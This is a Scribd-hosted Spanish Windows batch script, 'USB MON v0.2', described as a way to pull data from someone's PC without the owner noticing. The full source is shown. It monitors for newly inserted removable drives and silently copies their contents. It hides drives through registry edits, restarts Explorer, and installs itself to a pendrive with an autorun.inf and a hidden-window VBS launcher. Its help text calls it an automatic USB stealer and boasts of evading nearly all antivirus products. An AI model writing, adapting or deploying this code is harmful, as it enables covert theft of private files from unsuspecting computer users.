Scribd
Cargar
368 vistas8 páginas

Monitor USB y Copia Automática

este documento enseña como crear un archivo de lotes bat para poder sacar informacion de una pc automaticamente al conectar tu usb. sin que el dueño de la pc se entere

Cargado por

reblav9033
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd
368 vistas8 páginas

Monitor USB y Copia Automática

este documento enseña como crear un archivo de lotes bat para poder sacar informacion de una pc automaticamente al conectar tu usb. sin que el dueño de la pc se entere

Cargado por

reblav9033
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd

@Echo OFF

Title USB MON v0.2


REM By Elektro H@cker
Setlocal enabledelayedexpansion
Color 07
:: :: :: :: :: :: :: ::
::
::
::
CONFIGURACIN
::
::
::
:: :: :: :: :: :: :: ::
::
::
:: Directorio de inicio
Set "DIR=%~d0"
::
:: Directorio del log
Set "LOGFILE=.\[Link]"
::
:: Letras a monitorizar
Set "DRIVES= B C D E F G H I J K L M N O P Q R S T U V W X Y Z "
::
:: Letras hexadecimales (NO TOCAR)
Set "DRIVES_HEX=A:1 B:2 C:4 D:8 E:16 F:32 G:64 H:128 I:256 J:512 K:1024 L:2048
M:4096 N:8192 O:16384 P:32768 Q:65536 R:131072 S:262144 T:524288 U:1048576
V:2097152 W:4194304 X:8388608 Y:16777216 Z:33554432"
::
:: Ocultar unidades vacas en "MI PC"
(ACTIVAR / DESACTIVAR)
Set "HideDrivesWithNoMedia=ACTIVAR"
::
:: Ocultar la unidad de inicio de USB MON en "MI PC" (ACTIVAR / DESACTIVAR)
Set "HideUSBMONDrive=DESACTIVAR"
::
:: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: :: ::
REM Inicio del LOG
Call :Logo
Call :Write_Log >NUL
Call :Write_Log -------------------- >NUL
Call :Write_Log Iniciando USB MON... >NUL
Call :Write_Log -------------------- >NUL
Call :Write_Log >NUL
REM Ocultar unidades vacas en "MI PC"
REG Query
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
"HideDrivesWithNoMedia" >NUL 2>&1 && (
FOR /F "Tokens=3 Delims= " %%a in ('reg query
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
"HideDrivesWithNoMedia" 2^>NUL') do (
Set "Value=%%a"
)) || (Set "Value=0x1")
IF /I "%HideDrivesWithNoMedia%" EQU "ACTIVAR" (
IF /I NOT "%Value%" EQU "0x0" (
Call :Write_Log [+] Ocultando las unidades vacas en
REG ADD
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"

/V

/V

MI PC...
/V

"HideDrivesWithNoMedia" /T "REG_DWORD" /D "0" /F >NUL


) ELSE (
Set "HideDrivesWithNoMedia="
)
)
REM Ocultar la unidad de inicio de USB MON
IF /I "%HideUSBMONDrive%" EQU "ACTIVAR" (
REG QUERY "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /V
"ShowDrive_%DIR::=%" >NUL 2>&1 && (SET "HideUSBMONDrive=") || (
Call :Write_Log [+] Ocultando la unidad de USB MON en MI PC [%DIR
%]...
FOR %%# in (%DRIVES_HEX%) do (
Echo %%# | FIND "%DIR%" >NUL && (
Call SET "DIR_HEX=%%#"
CALL REG ADD
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /V
"NoDrives" /T "REG_DWORD" /D "%%DIR_HEX:~2%%" /F >NUL
)
)
)
)
REM Reinicia el proceso [Link]
Echo " %HideDrivesWithNoMedia% , %HideUSBMONDrive% " | FINDSTR /I
"\<ACTIVAR\>" >NUL && (
START /W Taskkill /F /IM "[Link]" >NUL
START /B [Link]
Timeout /T 5 2>NUL || (Ping -n 5 localhost >NUL)
)
REM Para revertir los cambios para "Ocultar unidades vacas en "MI PC"" en el
prximo reinicio del sistema
IF /I NOT "%Value%" EQU "0x0" (REG ADD
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /V
"ShowDrivesWithNoMedia" /D "CMD /C REG ADD
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /V
"HideDrivesWithNoMedia" /T "REG_DWORD" /D "1" /F >NUL" /F >NUL)
REM Para revertir los cambios para "Ocultar la unidad de inicio de USB MON" en
el prximo reinicio del sistema
IF /I "%HideUSBMONDrive%" EQU "ACTIVAR" (REG ADD
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /V "ShowDrive_%DIR::=
%" /D "CMD /C REG DELETE
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /V
"NoDrives" /F >NUL" /F >NUL)
REM Inicia el servicio de Disco Virtual para poder usar Diskpart
:SERVICE
Call :Logo
SC query "VDS" | FIND /I "PENDING" >NUL && (
Call :Write_Log Hay una detencin pendiente del servicio de Disco
virtual.
Call :Write_Log Esperando a que el servicio pueda reanudarse para
continuar...
Timeout /T 5 2>NUL || (Ping -n 5 localhost >NUL)
Goto :Service
)
SC query "VDS" | FIND /I "STOPPED" >NUL && (
Call :Write_Log El servicio de Disco virtual est detenido.

Call :Write_Log Iniciando el servicio...


sc config "VDS" start= "demand" >NUL 2>&1
sc start "VDS" >NUL 2>&1 || (
Call :Write_Log
Call :Write_Log * ERROR CRTICO *
Call :Write_Log No se pudo iniciar el servicio de Disco virtual,
Compruebe sus permisos de usuario.
Call :Write_Log Terminando el proceso...
Exit /B 1
)
) & (Call :Write_Log El servicio de Disco virtual se ha iniciado.)
REM Parmetros
IF
"%~1" EQU
IF /I "%~1" EQU
IF /I "%~1" EQU
IF /I "%~1" EQU

"/?"
"-ayuda"
"-instalar"
"-test"

(Goto
(Goto
(Goto
(Goto

:command_help)
:extended_help)
:install)
:test)

REM Elimina archivos temporales de una sesin anterior


DEL /Q "%WINDIR%\Temp\USBMON*" 2>NUL
REM Elimina los discos fijos para la monitorizacin
For /F "Tokens=3 delims= " %%# in ('Echo list vol ^| diskpart') DO (Set
"DRIVES=!DRIVES: %%# = !")
REM Elimina los dispositivos de DVD-ROM para la monitorizacin
For %%# in (%DRIVES%) DO (fsutil fsinfo drivetype %%#: | FIND /I "ROM" >NUL &&
(Set "DRIVES=!DRIVES: %%# = !"))
REM Monitoreo y auto-copiado
:MONITOR
Call :Logo
Echo Unidad de origen: [%DIR%]
Call :Write_Log Monitorizando unidades:!DRIVES!
Echo+ & Call :Write_Log >NUL
For /F "Tokens=3 delims= " %%# in ('Echo list vol ^| diskpart') DO (
Echo "%DRIVES%" | FIND /I "%%#" >NUL && (
For /F "Tokens=7,* delims= " %%A in ('Vol %%#: ^| FIND /I " %%#
"') Do (
IF "%%B" EQU "tiene etiqueta." (Set "LBL=Sin etiqueta")
ELSE (Set "LBL=%%B")
Call :Write_Log Hay un dispositivo conectado en la unidad
[%%#:] con etiqueta "!LBL!"
)
Call :Write_Log [+] Buscando archivos....
DIR /B /A "%%#:\*" >NUL 2>&1 && (
Call :Write_Log [+] Copiando archivos de la unidad [%%#:]
a la unidad [%DIR%]
MKDIR "%WINDIR%\Temp" 2>NUL
MKDIR "%DIR%\USBMON %COMPUTERNAME: =% [%%#] !LBL!" 2>NUL
IF EXIST "%WINDIR%\Temp\USBMON_%COMPUTERNAME: =%_[%%#]_!
LBL: =!_Lista.txt" (
XCOPY /A /C /E /H /J /K /O /Q /X "%%#:\*" "%DIR
%\USBMON %COMPUTERNAME: =% [%%#] !LBL!\" /EXCLUDE:%WINDIR%\Temp\USBMON_
%COMPUTERNAME: =%_[%%#]_!LBL: =!_Lista.txt
) ELSE (
XCOPY /A /C /E /H /J /K /O /Q /X /Y "%%#:\*" "%DIR
%\USBMON %COMPUTERNAME: =% [%%#] !LBL!\"
)

DEL /Q "%WINDIR%\Temp\USBMON_%COMPUTERNAME: =%_[%%#]_!LBL:


=!_Lista.txt" 2>NUL
PUSHD "%%#:\"
For /R %%a in (*) do (Echo %%a>>"%WINDIR%\Temp\USBMON_
%COMPUTERNAME: =%_[%%#]_!LBL: =!_Lista.txt")
POPD
) || (
Call :Write_Log [+] La unidad est vaca...
)
)
)
)
Timeout /T 10 2>NUL || (Ping -n 10 localhost >NUL)
Goto :MONITOR
:LOGO
CLS
ECHO+
ECHO+
.------.
ECHO+
_
_ ____
____
__ __
___
_
_
^| from-.-----.
ECHO+
^| ^| ^| ^|/ ___^| ^| __ )
^| \/ ^| / _ \ ^| \ ^| ^|
^|
that-^| -----^|
ECHO+
^| ^| ^| ^|\___ \ ^| _ \
^| ^|\/^| ^|^| ^| ^| ^|^| \^| ^|
^| -usb-^| to---^|
ECHO+
^| ^|_^| ^| ___) ^|^| ^|_) ^|
^| ^| ^| ^|^| ^|_^| ^|^| ^|\ ^|
^| -----^| -my--^|
ECHO+
\___/ ^|____/ ^|____/
^|_^| ^|_^| \___/ ^|_^| \_^|
'------^| drive^|
ECHO+
By Elektro H@cker
v0.2
'------'
ECHO+
GOTO:EOF
:WRITE_LOG
Echo %*
Call Echo [%DATE%] [%TIME: =%] %* >> "%LOGFILE%"
GOTO:EOF
:INSTALL
Call :Logo
Set "Extraibles="
For /F "Tokens=3 delims= " %%# in ('Echo list vol ^| diskpart ^| FIND /I
"xtra"') DO (Set "Extraibles=!Extraibles! %%#")
Echo Dispositivos extraibles conectados:!Extraibles! | MORE
Echo Escribe la letra del dispositivo donde se instalar USB MON...
Set /P "DriveDest=>> "
If Not exist "%DriveDest%:" (Goto :Install) ELSE (Copy /Y %0 "%DriveDest
%:\[Link]" >NUL)
Call :Logo
Echo Unidad seleccionada: [%DriveDest%:] | MORE
COPY /Y "%CD%\%[Link]" "%DriveDest%:\%[Link]" >NUL
Choice /M "Quiere crear un [Link]?"
If "!ERRORLEVEL!" EQU "1" (
Choice /M "Quiere que USBMON se ejecute en modo oculto?"
If "!ERRORLEVEL!" EQU "1" (

Set "EXT=vbs"
(
Echo Set wshShell = CreateObject("[Link]"^)
Echo [Link] """" ^& ".\%[Link]" ^& """", 0
)>"%DriveDest%:\%[Link]"
) ELSE (
Set "EXT=bat"
)
(
Echo [autorun]
Echo open=%0.!EXT!
Echo shell\USBMON=Ejecutar USB MON
Echo shell\USBMON\command=%0.!EXT!
Echo shell=USBMON
)>"%DriveDest%:\[Link]"
)
Call :Logo
Echo Gracias por utilizar USB MON
Pause&Exit /B 0

:^) | MORE

:TEST
Call :Logo
Echo: Comenzando el test... | MORE
Echo: [+] Buscando alguna unidad extrable en el PC...
Echo list vol | diskpart | FIND /I "xtra" >NUL || (
Echo: * ERROR CRTICO *
Echo: Porfavor inserta un dispositivo extrable en el PC.
Exit /B 1
)
For /F "Tokens=3 delims= " %%# in ('Echo list vol ^| diskpart ^| FIND /I
"xtra"') DO (
IF "%%#:" EQU "%DIR%" (
Echo: * ERROR CRTICO *
Echo: No debes ejecutar USB MON desde la unidad extrable en este
test.
Exit /B 1
)
Echo: [+] Unidad extrable encontrada [%%#:] | MORE
Call :Write_Log Iniciando un test en la unidad [%%#:] >NUL
Set "DRIVES= %%# "
MKDIR "%WINDIR%\Temp" 2>NUL
DEL /Q "%WINDIR%\Temp\USBMON_[%%#]*" 2>NUL
)
Echo: Se procede a monitorizar la unidad [%DRIVES: =%:]...
Timeout /T 10 2>NUL || (Ping -n 5 localhost >NUL)
Goto :Monitor
:COMMAND_HELP
call :Logo
Echo: /?
Echo: -ayuda
Echo: -install
Echo: -test
Exit /B 0

^^^|
^^^|
^^^|
^^^|

Muestra esta ayuda | MORE


Muestra la ayuda extendida | MORE
Instala USBMON en un dispositivo extrable | MORE
Inicia un test en un dispositivo extrable | MORE

:EXTENDED_HELP
Call :Logo
Echo - Que es USB MON?
Echo
________________ | MORE

Echo: USB MON (USB Monitor) es un programa portable con el fn de monitorizar


Echo: los nuevos dispositivos extraibles que se conecten a un PC
Echo: y copiar automticamente su contenido a la carpeta de USB MON. | MORE
Echo: USB MON no afecta a los dispositivos que ya se encuentren conectados a
un PC
Echo: en el momento que se ejecuta el programa. | MORE
Echo: En pocas palabras, USB MON es un "roba USB" automtico. | MORE
Pause&Call :Logo
Call :Logo
Echo - USB MON es compatible con todas las versiones de Windows?
Echo
__________________________________________________________ | MORE
Echo: USB MON ha sido testeado nicamente en Windows 7,
Echo: pero no debera dar problemas en Windows XP y Vista. | MORE
Pause&Call :Logo
Echo - Consejos para un correcto uso de USB MON
Echo
________________________________________ | MORE
Echo: Es conveniente ejecutar USB MON sin que hayan medios extraibles
conectados
Echo: en ese momento al PC, ya que esa letra de unidad quedara descartada. |
MORE
Echo: Es NECESARIO ocultar las unidades vacas en MI PC. | MORE
Pause&Call :Logo
Echo - Como funciona USB MON?
Echo
_______________________ | MORE
Echo: Al ejecutar USB MON se obtiene una lista de las letras de las unidades
Echo: conectadas al equipo en ese momento, esas letras se descartan
Echo: y se comienza a monitorizar el resto de letras en el equipo.
Echo: (Por eso es conveniente los consejos de uso de USB MON^) | MORE
Echo: Cuando USB MON detecta un dispositivo extraible insertado en alguna de
las
Echo: letras monitorizadas, se buscan archivos en esa unidad y se copian
Echo: a la carpeta del programa, excluyendo duplicados de archivos
echo: que se hayan copiado anteriormente de esa misma unidad. | MORE
Pause&Call :Logo
Echo - Como funciona las opciones de "Ocultar unidades" de USB MON?
Echo
_____________________________________________________________ | MORE
Echo Ocultar unidades vacas en "MI PC":
Echo: Se escribe una clave en el registro para ocultar las unidades visibles
Echo: sin medios insertados. | MORE
Echo Ocultar la unidad de inicio de USB MON en "MI PC":
Echo: Se escribe una clave en el registro para ocultar la unidad desde
Echo: donde se inicia USB MON. | MORE
Echo: Los cambios efectuados se revierten en el prximo reinicio del sistema.|
MORE
Echo: Si alguna de las dos opciones est activada se reiniciar el proceso del
Echo: [Link], para que los cambios surgan efecto al instante. | MORE
Pause&Call :Logo
Echo - Los antivirus pueden detectar USB MON?
Echo
_______________________________________ | MORE
Echo: En mi ltimo escaneo online solo lo ha detectado 1 de 42 antivirus: |
MORE
Echo: DrWeb [Link]
Echo: Fecha: 2012-09-26 | MORE
Pause&Call :Logo

Echo - Que es un [Link]?


Echo
_______________________ | MORE
Echo: Un autorun es un archivo de personalizacin preconfigurado para
USB/CD/DVD.
Echo; Se puede personalizar el aspecto del dispositivo, y ejecutar un proceso.
| MORE
Echo: Un autorun es detectado por el servicio de Reproduccin automtica de
windows,
Echo; La ejecucin del autorun depende de que el servico est habilitado en el
PC. | MORE
Echo: El servicio se puede habilitar desde la herramienta "[Link]". |
MORE
Pause&Call :Logo
Echo - Para que sirve la opcin "-instalar" de USB MON?
Echo
_________________________________________________ | MORE
Echo: Sirve para portabilizar el programa hacia una unidad extraible. | MORE
Echo: La opcin est pensada para ser instalada en un pendrive, as, con
Echo: la ayuda de un [Link], poder insertar el pendrive en otro equipo,
Echo: y monitorizar ese equipo para copiar los otros medios EXTRAIBLES a tu
pendrive. | MORE
Pause&Call :Logo
Echo - Para que sirve la opcin "-test" de USB MON?
Echo
_____________________________________________ | MORE
Echo: Sirve para realizar una pequea prueba de monitorizacin en una
Echo: unidad extrable aleatria de tu PC. | MORE
Echo: Es una prueba para ver si todo funciona con normalidad. | MORE
Echo: PD: El test ha de cancelarse manualmente apretando "CTRL + C" o cerrando
CMD. | MORE
Pause&Call :Logo
Echo - Cuando intento instalar USB MON con el [Link] no me funciona,
Porqu?
Echo
___________________________________________________________________________ |
MORE
Echo Windows XP/Vista:
Echo: El servicio de "Reproduccin automtica" debe estar activado en el
equipo. | MORE
Echo Windows 7:
Echo: Microsoft deshabilit POR COMPLETO el uso de un [Link] en
pendrives,
Echo: La nica manera de ejecutar un [Link] es disponer de un pendrive,
Echo: que se haga pasar por un dispositivo de CD-ROM para auto-reproducirse. |
MORE
Echo: PD: Infrmate en internet sobre el modelo de pendrive antes de
adquirirlo. | MORE
Pause&Call :Logo
Echo - Donde puedo conseguir ms programas tuyos?
Echo
___________________________________________ | MORE
Echo: No tengo ninguna web ni blog personal, pero puedes visitar
[Link] | MORE
Echo: All encontrars ms scripts tiles de todo tipo usando el buscador del
foro,
Echo: Tambin me encontrars moderando la seccin de Scripting, donde siempre
estar

Echo: dispuesto y encantado de resolver tus dudas. | MORE


Pause&Exit/B 0

También podría gustarte